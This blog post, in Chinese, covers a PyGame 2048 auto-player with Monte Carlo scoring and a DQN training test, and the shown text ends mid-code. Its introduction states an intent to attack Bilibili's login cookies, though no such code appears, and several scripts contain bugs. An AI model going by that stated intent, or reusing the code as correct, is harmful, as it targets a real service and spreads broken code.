【原创百篇纪念】2048蒙特卡洛法与强化学习测试+B站视频爬取与Cookie攻击测试

序言

这是笔者断更时间最长的一次,每次打开编辑器想要写些什么,却总是提不起兴致,或许因为这是第一百篇博客,出于某种仪式性的强迫,总是希望能够写出点有趣的内容出来。

然而新一轮的疫情扬州成为风暴眼,笔者被关了近四十天的禁闭,人在家里憋得太久确实是会愈发怠惰,失去活力,不仅是工作学习,而且原计划在暑期专攻 5000 5000 5000米争取达标 20 20 20分钟,结果到头又退化到半年前的水平。即便如此,也只有每天在跑步机上的几十分钟才能让笔者重新找回动力,零零碎碎地也做了不少尝试,却也迟迟没有足以提笔的素材。

回校第四天,决定还是把过去一个多月的工作挑出一些有趣的东西整理一文。本文分为两个部分:

  1. 第一部分是关于经典小游戏 2048 2048 2048的自动化脚本及强化学习算法 D Q N \rm DQN DQN的测试。缘起笔者在 B \rm B B站偶然发现的视频 U P \rm UP UP主的项目地址在GitHub@2048GameAutoMovePython,该项目是利用自定义评分函数及三层蒙特卡洛模拟实现的 P y G a m e \rm PyGame PyGame游戏自动化,效果确实非常卓越,经测试有八成以上的成功率通关 2048 2048 2048,如果将蒙特卡洛做到四五层成功率几乎做到 100 % 100\% 100%,其实代码核心是在于评分函数的设计,确实很巧妙,笔者觉得这是不容易想得到的。

    笔者的工作是在此基础上做了一些改进后在上面测试了强化学习的实现。由于笔者主攻自然语言处理,强化学习相对经验较少(众所周知强化学习在 N L P \rm NLP NLP里是走不通的),因此希望能够实现一个强化学习算法加深理解。本来准备自己实现一个推箱子游戏(私以为推箱子真的很难),正好抓到现成的可以用也就省事。很有意思的是,居然还有好事者写了推箱子的 P y t h o n \rm Python Pythongym-sokoban,可以直接使用pip安装,库项目地址在GitHub@gym-sokoban,另外gym是一个很有趣的强化学习包,是可以用来做物理引擎机器人的强化学习的。

    事实上近期笔者发现 g i t h u b \rm github github上有巨佬给出了一个非常好用的 P y T o r c h \rm PyTorch PyTorch实现的各种强化算法的仓库GitHub@Deep-Reinforcement-Learning-Algorithms-with-PyTorch,有空值得好好学习一下。

  2. 第二部分是关于 B \rm B B站视频下载及 C o o k i e \rm Cookie Cookie攻击测试,笔者本来确实很早有想要开始提笔,主要原因就是 C o o k i e \rm Cookie Cookie攻击测试进行的很不顺利,但是笔者认为 B \rm B B站在登录验证上确实存在很大漏洞,理论上存在可以攻破的可能,原因及攻击脚本详见下文。

    至于视频下载笔者给出两种下载的方式,第一种可以直接下载完整的 m p 4 \rm mp4 mp4文件,第二种则是将视频与音频分别下载,其实并不是很困难,因为 B \rm B B站完全没有在 J S \rm JS JS上对视频源的信息进行加密,第一种方法甚至只需要抓包即可,都不需要分析页面源码。

    另外 G i t H u b \rm GitHub GitHub有各视频网站视频下载的代码仓库,具体地址笔者忘了,但是好像它的代码并不开源,提供的只是安装程序,需要下载安装后使用。



第一部分 2048 2048 2048蒙特卡洛法与强化学习测试

(一) 2048 P y G a m e \rm 2048PyGame 2048PyGame脚本及蒙特卡洛法

代码可以直接从原作者处GitHub@gym-sokoban获取,为了能够和下面的强化学习承接上,可以使用笔者提供的整理后的代码,结构如下所示:

../
   manage.py
   config.py
../src/
       ai.py
       game.py
       utils.py
../logging/ # 空文件夹

上述五个文件的代码如下所示:

  • m a n a g e . p y \rm manage.py manage.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import time
import pygame

from pygame.locals import (QUIT,
                           KEYDOWN,
                           K_ESCAPE,
                           K_LEFT,
                           K_RIGHT,
                           K_DOWN,
                           K_UP,
                           K_w,
                           K_a,
                           K_s,
                           K_d,
                           K_k,
                           K_l,
                           MOUSEBUTTONDOWN)

from config import GameConfig

from src.utils import load_args, save_args, draw_text
from src.game import Game, Button
from src.ai import AI

args = load_args(GameConfig)
save_args(args, f'logging/config_{time.strftime("%Y%m%d%H%M%S")}.json')


# Initialize game
pygame.init()

# Set window
os.environ['SDL_VIDEO_WINDOW_POS'] = '%d,%d' % args.window_pos
raw_screen = pygame.display.set_mode((args.window_width, args.window_height), pygame.DOUBLEBUF, 32)
screen = raw_screen.convert_alpha()
pygame.display.set_caption(args.window_title)

interval = args.interval
state = 'start'
clock = pygame.time.Clock()
game = Game(args.grid_dim)
ai = AI(args)
next_direction = ''
last_time = time.time()
reward = -1

buttons = [
    Button('start', 'Restart', (args.grid_size + 50, 150)),
    Button('ai', 'Autorun', (args.grid_size + 50, 250)),
]


while not state == 'exit':

    if game.state in ['over', 'win']:
        state = game.state

    if state == 'ai' and next_direction == '':
        next_direction, reward = ai.get_next(game.grid.tiles, random_strategy=args.random_strategy)

    # Listen events
    for event in pygame.event.get():
        if event.type == QUIT:
            state = 'exit'
        if event.type == KEYDOWN:
            if event.key == K_ESCAPE:
                state = 'exit'
            elif event.key in [K_LEFT, K_a] and state == 'run':
                next_direction = 'L'
            elif event.key in [K_RIGHT, K_d] and state == 'run':
                next_direction = 'R'
            elif event.key in [K_DOWN, K_s] and state == 'run':
                next_direction = 'D'
            elif event.key in [K_UP, K_w] and state == 'run':
                next_direction = 'U'
            elif event.key in [K_k, K_l] and state == 'ai':
                if event.key == K_k and interval > 0:
                    interval *= 0.9
                if event.key == K_l and interval < 10:
                    if interval == 0:
                        interval = .01
                    else:
                        interval *= 1.1
                if interval < 0:
                    interval = 0

        if event.type == MOUSEBUTTONDOWN:
            for button in buttons:
                if button.is_click(event.pos):
                    state = button.name
                    if button.name == 'ai':
                        button.name = 'run'
                        button.text = 'Manual'
                    elif button.name == 'run':
                        button.name = 'ai'
                        button.text = 'Autorun'
                    break

    # Direction
    if next_direction and (state == 'run' or state == 'ai' and time.time() - last_time > interval):
        game.run(next_direction)
        next_direction = ''
        last_time = time.time()

    # Start game
    elif state == 'start':
        game.start()
        state = 'run'

    # Fill background color
    screen.fill((101, 194, 148))

    # Draw text
    draw_text(screen, f'Score: {game.score}', (args.grid_size + 100, 40), args.fontface)
    if state == 'ai':
        draw_text(screen, f'Interval: {interval}', (args.grid_size + 100, 60), args.fontface)
        draw_text(screen, f'Reward:{round(reward, 3)}', (args.grid_size + 100, 80), args.fontface)

    # Draw button
    for button in buttons:
        if button.is_show:
            pygame.draw.rect(screen, (180, 180, 200), (button.x, button.y, button.w, button.h))
            draw_text(screen, button.text, (button.x + button.w / 2, button.y + 9), args.fontface, size=18, center='center')

    # Draw map
    for y in range(args.grid_dim):
        for x in range(args.grid_dim):
            # Draw block
            number = game.grid.tiles[y][x]
            size = args.grid_size / args.grid_dim
            dx = size * 0.05
            x_size, y_size = x * size, y * size
            color = args.colors[str(int(number))] if number <= args.max_number else (0, 0, 255)
            pygame.draw.rect(screen, color, (x_size + dx, y_size + dx, size - 2 * dx, size - 2 * dx))
            color = (20, 20, 20) if number <= 4 else (255, 255, 255)
            if number:
                length = len(str(number))
                if length == 1:
                    text_size = size * 1.2 / 2
                elif length <= 3:
                    text_size = size * 1.2 / length
                else:
                    text_size = size * 1.5 / length
                draw_text(screen, str(int(number)), (x_size + size * 0.5, y_size + size * 0.5 - text_size / 2), args.fontface, color=color, size=args.fontsize, center='center')

    if state == 'over':
        pygame.draw.rect(screen, (0, 0, 0, 0.5), (0, 0, args.grid_size, args.grid_size))
        draw_text(screen, 'Game over!', (args.grid_size / 2, args.grid_size / 2), args.fontface, size=25, center='center')

    elif state == 'win':
        pygame.draw.rect(screen, (0, 0, 0, 0.5), (0, 0, args.grid_size, args.grid_size))
        self.draw_text('Win!', (args.grid_size / 2, args.grid_size / 2), args.fontface, size=25, center='center')

    # Update
    raw_screen.blit(screen, (0, 0))
    pygame.display.flip()
    clock.tick(args.FPS)

print('退出游戏')
  
  • c o n f i g . p y \rm config.py config.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import types
import argparse

class GameConfig:
    parser = argparse.ArgumentParser("--")
    parser.add_argument('--max_number', default=65536, type=int)
    parser.add_argument('--fontface', default='simhei', type=str)
    parser.add_argument('--fontsize', default=56, type=int)
    parser.add_argument('--window_pos', default=(100, 50), type=tuple)
    parser.add_argument('--window_title', default='2048', type=str)
    parser.add_argument('--window_width', default=720, type=int)
    parser.add_argument('--window_height', default=540, type=int)
    parser.add_argument('--FPS', default=60, type=int)
    parser.add_argument('--debug', default=False, type=bool)
    parser.add_argument('--interval', default=.0, type=float)
    parser.add_argument('--animation', default=False, type=bool)
    parser.add_argument('--grid_dim', default=4, type=int)
    parser.add_argument('--grid_size', default=500, type=int)
    parser.add_argument('--colors', default={'0': (205, 193, 180),
                                             '2': (238, 228, 218),
                                             '4': (237, 224, 200),
                                             '8': (242, 177, 121),
                                             '16': (245, 149, 99),
                                             '32': (246, 124, 95),
                                             '64': (246, 94, 59),
                                             '128': (237, 207, 114),
                                             '256': (237, 204, 97),
                                             '512': (237, 200, 80),
                                             '1024': (237, 197, 63),
                                             '2048': (255, 0, 0),
                                             '4096': (255, 0, 0),
                                             '8192': (255, 0, 0),
                                             '16384': (255, 0, 0),
                                             '32768': (255, 0, 0),
                                             '65536': (255, 0, 0)}, type=dict)
    parser.add_argument('--step_ahead', default=3, type=int)
    parser.add_argument('--random_strategy', default=False, type=bool)
    parser.add_argument('--action_mapping', default={'R': 0, 'D': 1, 'L': 2, 'U': 3}, type=dict)

class ModelConfig:
    parser = argparse.ArgumentParser("--")
    parser.add_argument('--max_number', default=65536, type=int)

if __name__ == "__main__":
    config = GameConfig()
    parser = config.parser
    args = parser.parse_args()
    print(args)
  • s r c / a i . p y \rm src/ai.py src/ai.py
# -*- coding: utf-8 -*- 

if __name__ == '__main__':
    import sys

    sys.path.append('../')

import itertools
import numpy as np

from src.game import Grid, Game
from src.utils import load_args
from config import GameConfig

class AI:
    def __init__(self, args):
        self.args = args
        self.grid = Grid(args.grid_dim)
        self.score_map = lambda z: z

    def debug(self, tiles):
        print('\n=======DEBUG========')
        print('Tile before moving:')
        self.print_tiles(tiles)
        score_list = []
        for directions in itertools.product('ULRD', repeat=2):
            _tiles = self.get_grid(tiles, directions)
            scores = self.get_score(_tiles)
            score_list.append([directions, scores])
            print('==={}=={}=='.format(directions, scores))
            self.print_tiles(_tiles)
        score_list = sorted(score_list, key=(lambda x: [x[1]]))
        for score in score_list[::-1]:
            self.grid.tiles = tiles.copy()
            if not self.grid.run(score[0][0], is_fake=True) == 0:
                self.grid.run(score[0][0])
                return score[0][0]
        return score_list[-1][0][0]

    def get_next(self, tiles, random_strategy=False):
        if random_strategy:
            return 'URDL'[np.random.randint(0, 4)], 0
        score_list = []
        tile_num = 0
        for row in tiles:
            for i in row:
                if i == 0:
                    tile_num += 1

        if tile_num >= self.grid.size ** 2 / 3:
            return 'RD'[np.random.randint(0, 2)], 0
        capacity = min(max(tile_num ** 2, 20), 40)
        for directions in itertools.product('ULRD', repeat=self.args.step_ahead):
            scores = []
            for _ in range(capacity):
                _tiles = self.get_grid(tiles, directions)
                scores.append(self.get_score(_tiles))
            # print(directions, min(scores))
            score_list.append([directions, min(scores)])
        score_list = sorted(score_list, key=(lambda x: [x[1]]))
        for score in score_list[::-1]:
            self.grid.tiles = tiles.copy()
            if not self.grid.run(score[0][0], is_fake=False) == 0:
                return score[0][0], score[1] / capacity
        self.grid.tiles = tiles.copy()
        return score_list[-1][0][0], score_list[-1][1] / capacity

    def get_score(self, tiles):
        a = self.get_bj2__4(tiles)
        b = self.get_bj__4(tiles)
        return a * 2.8 + b

    def get_grid(self, tiles, directions):
        g = Grid(self.args.grid_dim)
        g.tiles = tiles.copy()
        for direction in directions:
            g.run(direction)
            g.add_random_tile()
        return g.tiles

    def print_tiles(self, tiles):
        for row in tiles:
            for i in row:
                print("{:^6}".format(i), end='')
            print()

    def get_bj(self, tiles):
        gjs = [
            self.get_bj__1(tiles),
            self.get_bj__2(tiles),
            self.get_bj__3(tiles),
            self.get_bj__4(tiles)
        ]
        return gjs

    def get_bj2(self, tiles):
        gjs = [
            self.get_bj2__1(tiles),
            self.get_bj2__2(tiles),
            self.get_bj2__3(tiles),
            self.get_bj2__4(tiles)
        ]
        return gjs

    def get_bj__1(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * (x + (size - y) - (size * 2 - 1))
                else:
                    bj += (100 - 20 * (x + (size - y) - (size * 2 - 1)))
        return bj

    def get_bj__2(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * ((size - x) + (size - y) - (size * 2 - 1))
                else:
                    bj += (100 - 20 * ((size - x) + (size - y) - (size * 2 - 1)))
        return bj

    def get_bj__3(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * ((size - x) + y - (size * 2 - 1))
                else:
                    bj += (100 - 20 * ((size - x) + y - (size * 2 - 1)))
        return bj

    def get_bj__4(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * (x + y - (size * 2 - 1))
                else:
                    bj += (100 - 20 * (x + y - (size * 2 - 1)))
        return bj

    def get_bj2__1(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(0, length - 1, 1):
            for x in range(length - 1, 0, -1):
                z = tiles[y][x]
                if tiles[y][x] < tiles[y][x - 1]:
                    bj -= abs(self.score_map(tiles[y][x - 1]) - z)
                if tiles[y][x] < tiles[y + 1][x]:
                    bj -= abs(self.score_map(tiles[y + 1][x]) - z)
                if tiles[y][x] < tiles[y + 1][x - 1]:
                    bj -= abs(self.score_map(tiles[y + 1][x - 1]) - z)
        return bj

    def get_bj2__2(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(0, length - 1):
            for x in range(0, length - 1):
                z = tiles[y][x]
                if tiles[y][x] < tiles[y][x + 1]:
                    bj -= abs(self.score_map(tiles[y][x + 1]) - z)
                if tiles[y][x] < tiles[y + 1][x]:
                    bj -= abs(self.score_map(tiles[y + 1][x]) - z)
                if tiles[y][x] < tiles[y + 1][x + 1]:
                    bj -= abs(self.score_map(tiles[y + 1][x + 1]) - z)
        return bj

    def get_bj2__3(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(length - 1, 0, -1):
            for x in range(0, length - 1):
                z = tiles[y][x]
                if tiles[y][x] < tiles[y][x + 1]:
                    bj -= abs(self.score_map(tiles[y][x + 1]) - z)
                if tiles[y][x] < tiles[y - 1][x]:
                    bj -= abs(self.score_map(tiles[y - 1][x]) - z)
                if tiles[y][x] < tiles[y - 1][x + 1]:
                    bj -= abs(self.score_map(tiles[y - 1][x + 1]) - z)
        return bj

    def get_bj2__4(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(length - 1, 0, -1):
            for x in range(length - 1, 0, -1):
                z = tiles[y][x]
                if z < tiles[y][x - 1]:
                    bj -= abs(self.score_map(tiles[y][x - 1]) - z)
                if z < tiles[y - 1][x]:
                    bj -= abs(self.score_map(tiles[y - 1][x]) - z)
                if z < tiles[y - 1][x - 1]:
                    bj -= abs(self.score_map(tiles[y - 1][x - 1]) - z)
        return bj


if __name__ == '__main__':
    game = Game(4)
    game.grid.tiles = np.array([
        [0, 0, 0, 0],
        [0, 32, 64, 128],
        [256, 512, 1024, 1024],
        [1024, 1024, 1024, 1024]
    ])
    ai = Ai()
    print(game.grid)

    a = ai.get_next(game.grid.tiles)
    print(a)
    game.run(a[0])
    print(game.grid)
  • s r c / g a m e . p y \rm src/game.py src/game.py
# -*- coding: utf-8 -*- 

import random
import pygame
import numpy as np

nmap = {0: 'U', 1: 'R', 2: 'D', 3: 'L'}
fmap = dict([val, key] for key, val in nmap.items())

class Button(pygame.sprite.Sprite):
    def __init__(self, name, text, location, size=(100, 50)):
        pygame.sprite.Sprite.__init__(self)
        self.name = name
        self.text = text
        self.x, self.y = location
        self.w, self.h = size
        self.is_show = True

    def is_click(self, location):
        return self.is_show and self.x <= location[0] <= self.x + self.w and self.y <= location[1] <= self.y + self.h


class Grid(object):
    size = 4
    tiles = []
    max_tile = 0

    def __init__(self, size=4):
        self.size = size
        self.score = 0
        self.tiles = np.zeros((size, size)).astype(np.int32)

    def is_zero(self, x, y):
        return self.tiles[y][x] == 0

    def is_full(self):
        return 0 not in self.tiles

    def set_tiles(self, location, number):
        self.tiles[location[1]][location[0]] = number

    def get_random_location(self):
        if not self.is_full():
            while 1:
                x, y = random.randint(0, self.size - 1), random.randint(0, self.size - 1)
                if self.is_zero(x, y):
                    return x, y
        return -1, -1

    def add_tile_init(self):
        self.add_random_tile()
        self.add_random_tile()

    def add_random_tile(self):
        if not self.is_full():
            value = 2 if random.random() < 0.9 else 4
            self.set_tiles(self.get_random_location(), value)

    def run(self, direction, is_fake=False):
        if isinstance(direction, int):
            direction = nmap[direction]
        self.score = 0
        if is_fake:
            t = self.tiles.copy()
        else:
            t = self.tiles
        if direction == 'U':
            for i in range(self.size):
                self.move_hl(t[:, i])
        elif direction == 'D':
            for i in range(self.size):
                self.move_hl(t[::-1, i])
        elif direction == 'L':
            for i in range(self.size):
                self.move_hl(t[i, :])
        elif direction == 'R':
            for i in range(self.size):
                self.move_hl(t[i, ::-1])
        return self.score

    def move_hl(self, hl):
        len_hl = len(hl)
        for i in range(len_hl - 1):
            if hl[i] == 0:
                for j in range(i + 1, len_hl):
                    if hl[j] != 0:
                        hl[i] = hl[j]
                        hl[j] = 0
                        self.score += 1
                        break
            if hl[i] == 0:
                break
            for j in range(i + 1, len_hl):
                if hl[j] == hl[i]:
                    hl[i] += hl[j]
                    self.score += hl[j]
                    hl[j] = 0
                    break
                if hl[j] != 0:
                    break
        return hl

    def is_over(self):
        if not self.is_full():
            return False
        for y in range(self.size - 1):
            for x in range(self.size - 1):
                if self.tiles[y][x] == self.tiles[y][x + 1] or self.tiles[y][x] == self.tiles[y + 1][x]:
                    return False
        return True

    def is_win(self):
        if self.max_tile > 0:
            return self.max_tile in self.tiles
        else:
            return False

    def to_array(self, normalize=True):
        array = np.log2(self.tiles + np.ones(self.tiles.shape) * (self.tiles == 0)) if normalize else self.tiles.copy()
        return array.flatten().astype(np.int8)

    def __str__(self):
        str_ = '====================\n'
        for row in self.tiles:
            str_ += '-' * (5 * self.size + 1) + '\n'
            for i in row:
                str_ += '|{:4d}'.format(int(i))
            str_ += '|\n'
        str_ += '-' * (5 * self.size + 1) + '\n'
        str_ += '==================\n'
        return str_

class Game:
    score = 0
    env = 'testing'
    state = 'start'
    grid = None

    def __init__(self, grid_size=4, env='production'):
        self.env = env
        self.grid_size = grid_size
        self.start()

    def start(self):
        self.grid = Grid(self.grid_size)
        if self.env == 'production':
            self.grid.add_tile_init()
        self.state = 'run'

    def run(self, direction):
        if self.state in ['over', 'win']:
            return None
        if isinstance(direction, int):
            direction = nmap[direction]

        self.grid.run(direction)
        self.score += self.grid.score

        if self.grid.is_over():
            self.state = 'over'

        if self.grid.is_win():
            self.state = 'win'

        if self.env == 'production':
            self.grid.add_random_tile()
        return self.grid

    def printf(self):
        print(self.grid)
  • s r c / u t i l s . p y \rm src/utils.py src/utils.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

if __name__ == '__main__':
    import sys
    sys.path.append('../')

import time
import json
import pygame
import argparse

def load_args(Config):
    config = Config()
    parser = config.parser
    return parser.parse_args()

def save_args(args, save_path=None):

    class _MyEncoder(json.JSONEncoder):
        def default(self, obj):
            if isinstance(obj, type) or isinstance(obj, types.FunctionType):
                return str(obj)
            return json.JSONEncoder.default(self, obj)

    if save_path is None:
        save_path = f'../logging/config_{time.strftime("%Y%m%d%H%M%S")}.json'
    with open(save_path, 'w') as f:
        f.write(json.dumps(vars(args), cls=_MyEncoder))


def screenshot(screen, save_path=None):
    if save_path is None:
        save_path = f'../images/screenshot_{time.strftime("%Y%m%d%H%M%S")}.png'
        pygame.image.save(screen, save_path)


def draw_text(screen, text, location, face, color=(0, 0, 0), size=18, center='center'):
    x, y = location
    font = pygame.font.SysFont(face, size)
    text_render = font.render(text, 1, color)
    text_rect = text_render.get_rect()
    if center == 'center':
        text_rect.move_ip(x - text_rect.w // 2, y)
    else:
        text_rect.move_ip(x, y)
    screen.blit(text_render, text_rect)

if __name__ == '__main__':
    from config import GameConfig
    args = load_args(GameConfig)
    save_args(args)

运行 m a n a g e . p y \rm manage.py manage.py即可开始快乐的 2048 2048 2048小游戏使。方向键操控上下左右移动,也可以直接点击界面上的 a u t o r u n \rm autorun autorun,即可使用原作者内置的蒙塔卡罗评分算法进行自动化测试。

关于代码的简要说明:

  • 算法内置在 a i . p y \rm ai.py ai.py文件中,函数get_score()中,可以修改ab的系数,本质仍是往角上移动,后面的get_bj__1()get_bj__2()get_bj__3()get_bj__4()分别表示归到四个不同的角的算法,默认使用的是往右下角,因此 a u t o r u n \rm autorun autorun都是会在右下角得到 2048 2048 2048
  • 蒙特卡洛法在这里的意义就是模拟后三步的结果,寻找期望上得分最高的下一步移动策略,默认往后模拟三步,可以通过修改 c o n f i g . p y \rm config.py config.py中的step_ahead参数来提高模拟的深度。
  • 还可以通过修改 c o n f i g . p y \rm config.py config.py中的grid_dim来改变棋盘的大小,你可以在更大的棋盘上进行游戏。
  • 学习 g a m e . p y \rm game.py game.py里的写法与 m a n a g e . p y \rm manage.py manage.py中的游戏流程,对入门 P y G a m e \rm PyGame PyGame开发一些小游戏是很有帮助的。

(二)强化学习 D Q N \rm DQN DQN算法实现

这里笔者选择对较为基础的 D Q N \rm DQN DQN的实现,参考论文为Playing Atari with Deep Reinforcement Learning,算法伪代码如下:
Figure 1事实上该算法非常浅然, Q Q Q函数可以理解为是一个神经网络,输入的参数为当前状态( 2048 2048 2048中即棋盘上的数字情况)和一个行动策略( 2048 2048 2048中即上下左右四种行动策略之一),输出结果为评分(即 Q Q Q值)。训练样本可以通过游戏进行来获取得到,具体方法如下:

  1. 首先初始化最初的状态(即游戏开始时的棋盘)。
  2. 大概率选择一个 Q Q Q函数输出评分最高的行动策略,小概率随机选择一个行动策略。这就是 ϵ \epsilon ϵ贪婪策略,目的就是希望引入扰动使得更多的可能性被索到,如果只是基于 Q Q Q函数输出评分最高的行动策略就可能陷入局部最优。
  3. 接下来的 y j y_j yj即为理论上的标签值( ground truth \text{ground truth} ground truth),逻辑来源于动态规划中的贝尔曼方程,每步奖励 r j r_j rj这里恰好可以通过 2048 2048 2048游戏中右上角不断更新的得分值来表示。
  4. 这里每一次游戏模拟的结果都会存储到内存 D \mathcal{D} D中,每次从中抽取一批数据出来进行训练即可。

于是我们可以得到如下的实现(在上述文件目录中添加train.pysrc/model.py):

  • t r a i n . p y \rm train.py train.py
# -*- coding: utf-8 -*- 
# @author : caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import sys
import time
import random

import torch
from torch import optim
from torch.nn import MSELoss
import numpy as np

from src.ai import AI
from src.game import Game
from src.data import load_dataset_for_PN
from src.model import TestModel
from src.utils import load_args
from config import GameConfig

from copy import deepcopy

import pickle as pk

def train_DQN(args):
    # Initialization
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

    n_episodes = 10000
    epsilon = 1e-3 # epsilon greedy rate
    batch_size = 16
    n_samples = 1000

    discount_rate = 0.99

    # Load model
    model = TestModel()
    model = model.to(device)

    optimizer = optim.SGD(model.parameters(), lr=0.01)
    loss = MSELoss()

    # Start game
    replay_memory = []

    index2action = {index: action for action, index in args.action_mapping.items()}
    print(index2action)

    last_score = 0

    action_embedding = {
        'L': [1, 0, 0, 0],
        'R': [0, 1, 0, 0],
        'D': [0, 0, 1, 0],
        'U': [0, 0, 0, 1],
    }

    for episode in range(n_episodes):
        # action, _ = ai.get_next(game.grid.tiles)
        game = Game(args.grid_dim)
        ai = AI(args)
        game.start()
        while True:
            model.eval()
            # print(str(game.grid))
            if random.random() < epsilon: # epsilon greedy
                action = random.choice(list('LRDU'))
                game.run(action)
            else: # choose the best one
                action = None
                max_score = None
                for _action, embedding in action_embedding.items():
                    score = model(torch.FloatTensor(np.concatenate([game.grid.to_array(True), embedding])).unsqueeze(0).to(device))
                    if action is None:
                        action = _action
                        max_score = score
                    elif score > max_score:
                        action = _action
                        max_score = score
            last_game = deepcopy(game)
            game.run(action)

            # print(game.state)
            # print(str(game.grid))

            reward = game.score - last_score
            quadruple = (last_game, action, reward, deepcopy(game), game.state)
            replay_memory.append(quadruple) # Store memory
            last_score = game.score
            if game.state == 'over' or game.state == 'win':
                break
            # print(action, game.score)

            batch_data = replay_memory[:] if len(replay_memory) < batch_size else random.sample(replay_memory, k=batch_size)
            y_train_batch = []
            x_train_batch = []
            for (last_game, action, reward, current_game, state) in batch_data:
                if state in ['win', 'over']:
                    y_train = reward
                else:
                    model(torch.FloatTensor(np.concatenate([game.grid.to_array(True), embedding])).unsqueeze(0).to(device))
                    action = None
                    max_score = None
                    for _action, embedding in action_embedding.items():
                        score = model(
                            torch.FloatTensor(np.concatenate([current_game.grid.to_array(True), embedding])).unsqueeze(0).to(
                                device))
                        if action is None:
                            action = _action
                            max_score = score
                        elif score > max_score:
                            action = _action
                            max_score = score
                    y_train = reward + discount_rate * max_score
                x_train = np.concatenate([game.grid.to_array(True), action_embedding[action]])
                y_train_batch.append(y_train)
                x_train_batch.append(x_train)

            y_train_batch = torch.FloatTensor(y_train_batch).to(device)
            x_train_batch = torch.FloatTensor(x_train_batch).to(device)

            # Train
            model.train()
            optimizer.zero_grad()
            y_prob = model(x_train_batch)
            loss_value = loss(y_prob, y_train_batch)
            loss_value.backward()
            optimizer.step()
            print(episode, loss_value)
    torch.save(model, 'model.h5')

if __name__ == '__main__':
    args = load_args(GameConfig)
    train_DQN(args)
  • s r c / m o d e l . p y \rm src/model.py src/model.py:模型中目前暂时先写了一个用于测试的简单模型,因为模型的构建目前还没有比较好的理论支持,本脚本只是用于对强化学习算法的实现测试,并不追求效果。因此模型的输入默认为 20 20 20维即 16 16 16维棋盘加 4 4 4维的上下左右的 one-hot \text{one-hot} one-hot编码值。
# -*- coding: utf-8 -*- 
# @author : caoyang
# @email: caoyang@163.sufe.edu.cn

import torch
from torch import nn
from torch import functional as F

class TestModel(nn.Module):

    def __init__(self):
        super(TestModel, self).__init__()
        # self.linear_1 = nn.Linear(in_features=16, out_features=128, bias=True)
        # self.linear_2 = nn.Linear(in_features=128, out_features=4, bias=True)
        # self.softmax = nn.Softmax(dim=-1)
        self.linear_1 = nn.Linear(in_features=20, out_features=128, bias=True)
        self.linear_2 = nn.Linear(in_features=128, out_features=1, bias=True)

    def forward(self, x):
        x = self.linear_1(x)
        # x = self.linear_2(x)
        # output = self.softmax(x)
        output = self.linear_2(x)
        return output

值得注意的点有两个:

  1. 起初笔者想是否可以只让模型输入当前状态(即棋盘)即可,然后输出为不同行动策略的概率分布(即 s o f t m a x \rm softmax softmax激活函数输出),看起来似乎确实不需要将行动策略作为输入。至少这种想法在 D Q N \rm DQN DQN上是不能实现的,而且最重要的是如果行动策略的空间非常大(对于 2048 2048 2048很小,只有 4 4 4维),那么模型输出就会异常复杂,许多游戏在不同状态下的可能行动数量都是不等的(如围棋越到后面行动空间就会越小),就更无法通过 D Q N \rm DQN DQN实现了。当然直接输出行动也是有算法的,即 P o l i c y   N e t w o r k \rm Policy\space Network Policy Network,本文不作讨论。
  2. 从算法上来看 D Q N \rm DQN DQN有明显的弱点,即它需要频繁地寻找使得 Q Q Q函数取值最大的行动策略,如果行动策略很多,这是很难搜索的。
  3. 由于原作者给出的评分策略确实是非常好,本身已经就是一个可用的 Q Q Q函数,事实上可以利用原先的游戏直接生成足够多的 e p i s o d e \rm episode episode数据作为内存 D \mathcal{D} D用于训练,代码如 g e n e r a t e _ e p i s o d e . p y \rm generate\_episode.py generate_episode.py所示:
  • generate_episode.py \text{generate\_episode.py} generate_episode.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import time
import pygame
import pandas as pd

from pygame.locals import (QUIT,
                           KEYDOWN,
                           K_ESCAPE,
                           K_LEFT,
                           K_RIGHT,
                           K_DOWN,
                           K_UP,
                           K_w,
                           K_a,
                           K_s,
                           K_d,
                           K_k,
                           K_l,
                           MOUSEBUTTONDOWN)

from config import GameConfig

from src.utils import load_args, save_args, draw_text
from src.game import Game, Button
from src.ai import AI


def run(args, episode_path=None):
    interval = args.interval
    state = 'start'
    # clock = pygame.time.Clock()
    game = Game(args.grid_dim)
    ai = AI(args)
    next_direction = ''
    last_time = time.time()

    buttons = [
        Button('start', 'Restart', (args.grid_size + 50, 150)),
        Button('ai', 'Autorun', (args.grid_size + 50, 250)),
    ]

    episode_dict = {
        'action': [],
        'tiles': [],
        'score': [],
        'reward': [],
    }

    while not state == 'exit':
        if game.state in ['over', 'win']:
            state = game.state

        # Start game
        if state == 'start':
            game.start()
            state = 'ai'

        if state == 'ai' and next_direction == '':
            next_direction, reward = ai.get_next(game.grid.tiles, random_strategy=args.random_strategy)
            current_direction = next_direction

            # Logging Episode
            tiles = []
            for y in range(args.grid_dim):
                for x in range(args.grid_dim):
                    tiles.append(game.grid.tiles[y][x])
            episode_dict['tiles'].append(tuple(tiles))
            episode_dict['action'].append(current_direction)
            episode_dict['score'].append(game.score)
            episode_dict['reward'].append(reward)

        # Direction
        if next_direction and (state == 'run' or state == 'ai' and time.time() - last_time > interval):
            game.run(next_direction)
            next_direction = ''
            # last_time = time.time()
        if state == 'over':
            break

        elif state == 'win':
            break

    df = pd.DataFrame(episode_dict, columns=list(episode_dict.keys()))
    if episode_path is not None:
